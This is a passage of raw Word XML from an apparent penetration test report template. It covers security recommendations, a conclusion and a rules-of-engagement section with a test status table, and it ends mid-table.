    <w:p w14:paraId="007F2D7E" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Review the architecture of the application and deploy a Web Application Firewall (WAF) to detect malicious manipulations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A00E39C" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Continuously monitor logs for anomalies to detect abnormal behavior and fraud transactions; assign a dedicated security operations engineer to this task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28B149" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement a robust Patch Management procedure for the entire IT infrastructure and endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57262C26" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00E0093A" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Regularly patch production and development environments and systems with the latest releases and security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E78A251" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00326D4D" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326D4D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Conduct annual penetration tests and quarterly vulnerability scans for internal and external environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7E893" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00326D4D" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326D4D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Provide security coding training for developers and develop Security Awareness training for employees and developers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A21FA6" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00326D4D" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326D4D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Develop and maintain an Incident Response Plan to address data breaches or security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A511C0" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00326D4D" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326D4D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Analyze risks for key assets and resources and update the codebase to conduct verification and sanitization of user input on both client and server sides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6C28D" w14:textId="77777777" w:rsidR="00784033" w:rsidRPr="00326D4D" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326D4D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use only encrypted channels for communications and improve server and application configurations to adhere to security best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72825FDB" w14:textId="77777777" w:rsidR="00784033" w:rsidRDefault="00784033" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326D4D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Conduct remediation testing of both infrastructure and web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA43D16" w14:textId="77777777" w:rsidR="00784033" w:rsidRDefault="00784033" w:rsidP="00784033">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D258B3B" w14:textId="77777777" w:rsidR="00214926" w:rsidRDefault="00214926" w:rsidP="00864399">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEE03BA" w14:textId="3BE83C0B" w:rsidR="00880A05" w:rsidRPr="0073315A" w:rsidRDefault="00784033" w:rsidP="0073315A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc178498959"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00880A05" w:rsidRPr="0073315A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Conclusion:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="073DA6BA" w14:textId="30C88ECA" w:rsidR="00880A05" w:rsidRDefault="00880A05" w:rsidP="00864399">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="4E30AD5D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The implementation of the recommendations outlined in this report, along with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="4E30AD5D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">adherence </w:t>
      </w:r>
      <w:r w:rsidR="00864399" w:rsidRPr="4E30AD5D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4E30AD5D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="4E30AD5D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> best practices, will significantly enhance the security posture of [Client]. It is crucial to recognize that the data presented reflects a snapshot in time, and ongoing vigilance through periodic security assessments is essential to maintaining robust defenses against evolving threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A114FD9" w14:textId="77622942" w:rsidR="006B546A" w:rsidRDefault="006B546A" w:rsidP="006B546A"/>
    <w:p w14:paraId="20971DDC" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="106B2D75" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="09A84EDA" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="3D5CD2A9" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="03B59FAF" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="5E190E84" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="24E18AE6" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="6A8CC8F1" w14:textId="77777777" w:rsidR="00B22BFD" w:rsidRDefault="00B22BFD" w:rsidP="006B546A"/>
    <w:p w14:paraId="527FD8D2" w14:textId="77777777" w:rsidR="00EA73DE" w:rsidRDefault="00EA73DE" w:rsidP="006B546A"/>
    <w:p w14:paraId="61AE48F3" w14:textId="77777777" w:rsidR="00EA73DE" w:rsidRDefault="00EA73DE" w:rsidP="006B546A"/>
    <w:p w14:paraId="2E0359D4" w14:textId="7378AB41" w:rsidR="00112BBC" w:rsidRPr="007F10D6" w:rsidRDefault="00112BBC" w:rsidP="00E45DBD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="rules-of-engagement"/>
      <w:bookmarkStart w:id="20" w:name="_Toc178498960"/>
      <w:r w:rsidRPr="007F10D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RULES OF ENGAGEMENT</w:t>
      </w:r>
      <w:r w:rsidR="007F10D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F10D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58E66D1C" w14:textId="77777777" w:rsidR="00D573B3" w:rsidRDefault="00D573B3" w:rsidP="00D573B3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6161889A" w14:textId="7D76F322" w:rsidR="00D573B3" w:rsidRPr="00B22BFD" w:rsidRDefault="00D573B3" w:rsidP="00D573B3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B22BFD">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The ROE ensures clarity and alignment between the penetration tester and the client, helping avoid misunderstandings and maintaining legal and ethical boundaries.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B22BFD">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B22BFD">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Client commissioned the Testing Company to perform the following penetration testing services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13B2A7" w14:textId="77777777" w:rsidR="00D573B3" w:rsidRDefault="00D573B3" w:rsidP="00D573B3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E39E0EF" w14:textId="77777777" w:rsidR="00D573B3" w:rsidRDefault="00D573B3" w:rsidP="00D573B3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5199E518" w14:textId="667BC1AD" w:rsidR="00112BBC" w:rsidRPr="00216F2F" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00216F2F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical network-level penetration testing of internet-facing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00216F2F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hosts ,against</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00216F2F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodes in internal networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6A3B6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00216F2F" w:rsidRDefault="00112BBC" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00216F2F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Social Engineering and email phishing directed at CLIENT employee accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04A6DB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC6944F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF3365C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00216F2F" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="engagement-time-details"/>
      <w:bookmarkStart w:id="22" w:name="_Toc178498961"/>
      <w:r w:rsidRPr="00216F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Engagement Time Details:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="3712" w:type="pct"/>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239"/>
        <w:gridCol w:w="3702"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="1B22EE21" w14:textId="77777777" w:rsidTr="00EC2A0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shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="6C795EEE" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Preferred Start Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2667" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="073BC5E1" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3C313A8E" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="261633F8" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Preferred End Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3CD46B9D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="38803C94" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="47A02F3B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Testing Period</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6740B582" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>7 days (September 20–27, 2024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="1D26FA28" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="2AA0D960" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Time Restrictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77C00905" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Avoid certain hours to prevent disruptions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B579563" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00FD7F3C" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="engagement-tests-details"/>
      <w:bookmarkStart w:id="24" w:name="_Toc178498962"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00FD7F3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Engagement Tests Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="6A0AF464" w14:textId="4B2D9687" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="engagement-performed-tests"/>
      <w:bookmarkStart w:id="26" w:name="_Toc178498963"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Engagement</w:t>
      </w:r>
      <w:r w:rsidR="00FC43D3" w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Performed</w:t>
      </w:r>
      <w:r w:rsidR="00FC43D3" w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="3661" w:type="pct"/>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972"/>
        <w:gridCol w:w="2874"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="1873E3B9" w14:textId="77777777" w:rsidTr="00EC2A0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shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="414EA33A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Performed Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00D8CE6D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="659517B0" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="30F3E58F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Host and service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="17BA6A84" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Fails criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="05BB5DC2" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="23BAB94E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Weak passwords attack and brute-force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4D63B8F5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Fails criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="7EA8A9CF" w14:textId="77777777" w:rsidTr="00EC2A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="244061" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="00088B49" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Identification of misconfigurations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="62D41EA6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Fails criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
